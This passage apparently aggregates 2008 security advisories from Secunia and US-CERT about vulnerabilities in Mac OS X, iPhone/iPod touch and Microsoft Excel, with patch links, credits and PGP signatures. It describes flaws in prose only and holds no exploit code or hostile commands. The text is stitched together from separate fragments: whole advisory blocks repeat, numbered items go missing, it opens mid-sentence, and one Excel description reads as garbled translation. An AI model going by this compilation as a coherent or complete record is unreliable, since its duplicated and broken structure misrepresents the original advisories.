Mastenbrook. ORIGINAL ADVISORY: Apple: http://docs.info.apple.com/article.html?artnum=307430 OTHER REFERENCES: SA27040: http://secunia.com/advisories/27040/ SA27760: http://secunia.com/advisories/27760/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Launch Services in Apple Mac OS X 10.5 through 10.5.1 allows an uninstalled application to be launched if it is in a Time Machine backup, which might allow local users to bypass intended security restrictions or exploit vulnerabilities in the application. A vulnerability in the way Apple Mac OS X handles specially crafted URLs may allow an attacker to execute arbitrary code. Apple Mac OS X is prone to multiple security vulnerabilities. These issues affect Mac OS X and various applications, including Launch Services, Mail, NFS, Parental Controls, and Terminal. Attackers may exploit these issues to execute arbitrary code, trigger denial-of-service conditions, escalate privileges, and potentially compromise vulnerable computers. Apple Mac OS X 10.5.1 and prior versions are vulnerable to these issues. Apple Mac Operating System X 10.5 to 10.5.1, its Launch service is an API for opening applications, document files, or URLs in a manner similar to Finder or Dock. I. Further details are available in the US-CERT Vulnerability Notes Database. These products include Samba and X11. II. Impact The impacts of these vulnerabilities vary. III. These and other updates are available via Software Update or via Apple Downloads. IV. Please send email to <cert@cert.org> with "TA08-043B Feedback VU#774345" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2008 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History February 12, 2008: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBR7HyXPRFkHkM87XOAQLgawf/WfBp5mjT+DZriprWRqe1HM4Z9SSe/5Dg jMgSlX1j/YJC7FgZfjJvriQ+yXeOnhwvKggfTbkJWej+0AeRbyIUFWD/ZTh2Qylp /1vBehJW9nhT2yMT65/gT/MnbArN11AILkfSGr4W6xLPMR2zq0HsrP2SxYlAVkSO PPlo0KhWWATcjHjJEacdmry4fR6iv6xA0gFjWN6i18VX5LSMOEyO3LpDt+Rk8fet r7Pwi/QEr/nipEEw8R8Jg9+LT8dqQL1t+yhTa5pV1rceuEb3Cz67paHAqRneldW9 SAl/TPznmYCCMHqyOfHdRBUVvOxI09OPjHYkf7ghv5e06LqbfVMZug== =qwP5 -----END PGP SIGNATURE----- . ---------------------------------------------------------------------- A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched. 1) An unspecified error exists within Foundation in Safari's handling of URLs. This can be exploited to cause a memory corruption when a user is enticed to access a specially crafted URL. Successful exploitation may allow execution of arbitrary code. 3) An error in the handling of file:// URLs in Mail can be exploited to execute arbitrary applications without warning when a user is enticed to click on a URL within a message. 4) An unspecified error exists within NFS when handling mbuf chains. This can be exploited to cause a memory corruption and allows a system shutdown and potential execution of arbitrary code. 5) The problem is that Parental Controls contacts www.apple.com when a site is unblocked and allows for detection of computers running Parental Controls. 6) A boundary error in Samba can be exploited by malicious people to compromise a vulnerable system. For more information: SA27760 7) An input validation error exists in Terminal when processing URL schemes. This can be exploited to launch an application with arbitrary command line parameters and may allow execution of arbitrary code when a user visits a specially crafted web page. 8) Multiple vulnerabilities in X11 X Font Server can be exploited by malicious, local users to gain escalated privileges. For more information: SA27040 9) An error exists in X11, which causes certain settings ("Allow connections from network client") not to be applied. Security Update 2008-001 (PPC): http://www.apple.com/support/downloads/securityupdate2008001ppc.html Security Update 2008-001 (Universal): http://www.apple.com/support/downloads/securityupdate2008001universal.html Mac OS X 10.5.2 Combo Update: http://www.apple.com/support/downloads/macosx1052comboupdate.html Mac OS X Server 10.5.2 Combo Update: http://www.apple.com/support/downloads/macosxserver1052comboupdate.html PROVIDED AND/OR DISCOVERED BY: 2) The vendor credits Steven Fisher of Discovery Software Ltd. and Ian Coutier. 4) The vendor credits Oleg Drokin, Sun Microsystems. 5) The vendor credits Jesse Pearson. 6) Alin Rad Pop, Secunia Research. 7) The vendor credits Olli Leppanen of Digital Film Finland, and Brian Mastenbrook. ORIGINAL ADVISORY: Apple: http://docs.info.apple.com/article.html?artnum=307430 OTHER REFERENCES: SA27040: http://secunia.com/advisories/27040/ SA27760: http://secunia.com/advisories/27760/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

X11 in Apple Mac OS X 10.5 through 10.5.1 does not properly handle when the "Allow connections from network client" preference is disabled, which allows remote attackers to bypass intended access restrictions and connect to the X server. Apple Mac OS X is prone to multiple security vulnerabilities. These issues affect Mac OS X and various applications, including Launch Services, Mail, NFS, Parental Controls, and Terminal. Attackers may exploit these issues to execute arbitrary code, trigger denial-of-service conditions, escalate privileges, and potentially compromise vulnerable computers. Apple Mac OS X 10.5.1 and prior versions are vulnerable to these issues. I. Further details are available in the US-CERT Vulnerability Notes Database. These products include Samba and X11. II. Impact The impacts of these vulnerabilities vary. III. These and other updates are available via Software Update or via Apple Downloads. IV. Please send email to <cert@cert.org> with "TA08-043B Feedback VU#774345" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2008 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History February 12, 2008: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBR7HyXPRFkHkM87XOAQLgawf/WfBp5mjT+DZriprWRqe1HM4Z9SSe/5Dg jMgSlX1j/YJC7FgZfjJvriQ+yXeOnhwvKggfTbkJWej+0AeRbyIUFWD/ZTh2Qylp /1vBehJW9nhT2yMT65/gT/MnbArN11AILkfSGr4W6xLPMR2zq0HsrP2SxYlAVkSO PPlo0KhWWATcjHjJEacdmry4fR6iv6xA0gFjWN6i18VX5LSMOEyO3LpDt+Rk8fet r7Pwi/QEr/nipEEw8R8Jg9+LT8dqQL1t+yhTa5pV1rceuEb3Cz67paHAqRneldW9 SAl/TPznmYCCMHqyOfHdRBUVvOxI09OPjHYkf7ghv5e06LqbfVMZug== =qwP5 -----END PGP SIGNATURE----- . ---------------------------------------------------------------------- A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched. 1) An unspecified error exists within Foundation in Safari's handling of URLs. This can be exploited to cause a memory corruption when a user is enticed to access a specially crafted URL. Successful exploitation may allow execution of arbitrary code. 2) A weakness exists due to Launch Services allowing users to start uninstalled applications from a Time Machine Backup. 3) An error in the handling of file:// URLs in Mail can be exploited to execute arbitrary applications without warning when a user is enticed to click on a URL within a message. 4) An unspecified error exists within NFS when handling mbuf chains. This can be exploited to cause a memory corruption and allows a system shutdown and potential execution of arbitrary code. 5) The problem is that Parental Controls contacts www.apple.com when a site is unblocked and allows for detection of computers running Parental Controls. 6) A boundary error in Samba can be exploited by malicious people to compromise a vulnerable system. For more information: SA27760 7) An input validation error exists in Terminal when processing URL schemes. This can be exploited to launch an application with arbitrary command line parameters and may allow execution of arbitrary code when a user visits a specially crafted web page. 8) Multiple vulnerabilities in X11 X Font Server can be exploited by malicious, local users to gain escalated privileges. For more information: SA27040 9) An error exists in X11, which causes certain settings ("Allow connections from network client") not to be applied. Security Update 2008-001 (PPC): http://www.apple.com/support/downloads/securityupdate2008001ppc.html Security Update 2008-001 (Universal): http://www.apple.com/support/downloads/securityupdate2008001universal.html Mac OS X 10.5.2 Combo Update: http://www.apple.com/support/downloads/macosx1052comboupdate.html Mac OS X Server 10.5.2 Combo Update: http://www.apple.com/support/downloads/macosxserver1052comboupdate.html PROVIDED AND/OR DISCOVERED BY: 2) The vendor credits Steven Fisher of Discovery Software Ltd. and Ian Coutier. 4) The vendor credits Oleg Drokin, Sun Microsystems. 5) The vendor credits Jesse Pearson. 6) Alin Rad Pop, Secunia Research. 7) The vendor credits Olli Leppanen of Digital Film Finland, and Brian Mastenbrook. ORIGINAL ADVISORY: Apple: http://docs.info.apple.com/article.html?artnum=307430 OTHER REFERENCES: SA27040: http://secunia.com/advisories/27040/ SA27760: http://secunia.com/advisories/27760/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Unspecified vulnerability in Passcode Lock in Apple iPhone 1.0 through 1.1.2 allows users with physical access to execute applications without entering the passcode via vectors related to emergency calls. Attackers with physical access to the device can exploit this issue to gain unauthorized access to applications. This may aid in various attacks, including information disclosure. Versions prior to iPhone 1.1.3 and 2.1 are vulnerable. Apple iPhone is a smart phone of Apple (Apple). ---------------------------------------------------------------------- A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched. Download and test it today: https://psi.secunia.com/ Read more about this new version: https://psi.secunia.com/?page=changelog ---------------------------------------------------------------------- TITLE: Apple iPhone / iPod touch Multiple Vulnerabilities SECUNIA ADVISORY ID: SA28497 VERIFY ADVISORY: http://secunia.com/advisories/28497/ CRITICAL: Highly critical IMPACT: Security Bypass, Cross Site Scripting, System access WHERE: >From remote OPERATING SYSTEM: Apple iPhone 1.x http://secunia.com/product/15128/ Apple iPod touch 1.x http://secunia.com/product/16074/ DESCRIPTION: Two vulnerabilities and a security issue have been reported in Apple iPhone and iPod touch, which can be exploited by malicious people to conduct cross-site scripting attacks, bypass certain security restrictions, or to compromise a vulnerable device. 1) An unspecified error in the handling of URLs exists in Safari. This can be exploited to cause a memory corruption when a user is enticed to access a specially crafted URL. Successful exploitation may allow execution of arbitrary code. This security issue is reported in iPhone v1.0 through v1.1.2 only. 3) An error in Safari can be exploited by malicious people to conduct cross-site scripting attacks. For more information see vulnerability #21 in: SA28136 SOLUTION: Update to version 1.1.3 (downloadable and installable via iTunes). PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: Apple: http://docs.info.apple.com/article.html?artnum=307302 OTHER REFERENCES: SA28136: http://secunia.com/advisories/28136/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Unspecified vulnerability in Microsoft Excel 2000 SP3 through 2003 SP2, Viewer 2003, and Office 2004 for Mac allows user-assisted remote attackers to execute arbitrary code via crafted macros, aka "Macro Validation Vulnerability," a different vulnerability than CVE-2007-3490. Microsoft Excel for, Excel There is a memory corruption vulnerability due to a flaw in the handling of file headers.crafted by a third party Excel The file may lead to arbitrary code execution. Microsoft Excel is prone to a remote code-execution vulnerability. An attacker may exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions. There are multiple code execution vulnerabilities in the way of processing data when Excel imports files, the way of processing Style record data, the way of processing conditional format values, and the way of processing macros. ---------------------------------------------------------------------- A new version (0.9.0.0 - Release Candidate 1) of the free Secunia PSI has been released. The new version includes many new and advanced features, which makes it even easier to stay patched. NOTE: According to Microsoft, this is currently being actively exploited. SOLUTION: Do not open untrusted Excel files. Please see the vendor's advisory for details. PROVIDED AND/OR DISCOVERED BY: Discovered as a 0-day. ORIGINAL ADVISORY: Microsoft (KB947563): http://www.microsoft.com/technet/security/advisory/947563.mspx ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA08-071A Microsoft Updates for Multiple Vulnerabilities Original release date: March 11, 2008 Last revised: -- Source: US-CERT Systems Affected * Microsoft Office * Microsoft Outlook * Microsoft Excel * Microsoft Excel Viewer * Microsoft Office for Mac * Microsoft Office Web Componenets Overview Microsoft has released updates that address vulnerabilities in Microsoft Office, Outlook, Excel, Excel Viewer, Office for Mac, and Office Web Components. I. Description Microsoft has released updates to address vulnerabilities that affect Microsoft Office, Outlook, Excel, Excel Viewer, Office for Mac, and Office Web Components as part of the Microsoft Security Bulletin Summary for March 2008. For more information, see the US-CERT Vulnerability Notes Database. II. III. Solution Apply updates from Microsoft Microsoft has provided updates for these vulnerabilities in the March 2008 security bulletin. The security bulletin describe any known issues related to the updates. Administrators are encouraged to note these issues and test for any potentially adverse effects. Administrators should consider using an automated update distribution system such as Windows Server Update Services (WSUS). IV. References * US-CERT Vulnerability Notes for Microsoft March 2008 updates - <http://www.kb.cert.org/vuls/byid?searchview&query=ms08-mar> * Microsoft Security Bulletin Summary for March 2008 - <http://www.microsoft.com/technet/security/bulletin/ms08-mar.mspx> * Microsoft Update - <https://www.update.microsoft.com/microsoftupdate/> * Windows Server Update Services - <http://www.microsoft.com/windowsserversystem/updateservices/default.mspx> _________________________________________________________________ The most recent version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA08-071A.html> _________________________________________________________________ Feedback can be directed to US-CERT Technical Staff. Please send email to <cert@cert.org> with "TA08-071A Feedback VU#393305" in the subject. _________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. _________________________________________________________________ Produced 2008 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBR9b0APRFkHkM87XOAQLTUwf9HHlM9vQfwMpmCv77RuJKdZgdn5bNTPQA HjsABoxmVZzE4XnArclHPyMivO8x/oel6UFvZgG/h2oGFarK7h1WpvCFQKE/cNO8 c5o0tRhxMx+ri7w7DnkhmhbWTLQ8coqKjzAioKoc2mboNz+PamQO22INjS3ktOyL dRA+qwxSsPN3Bi7NDS2DOdUeAA+VdMn0cQTDLHJ7ZPhzy7JOiVXwQwyO3CwNDeOl C6+FGSk8o1BsMjdP6kRaGnQkgivBi1ID4dcAQA8h0K2IGDPkCBIYiGTvj9pNnpwZ lrP6DdHyd2idzGEXr2R0VlTQPrhabs+YpZq+qzVh6f2tg+Lc9xBwHg== =aCnE -----END PGP SIGNATURE-----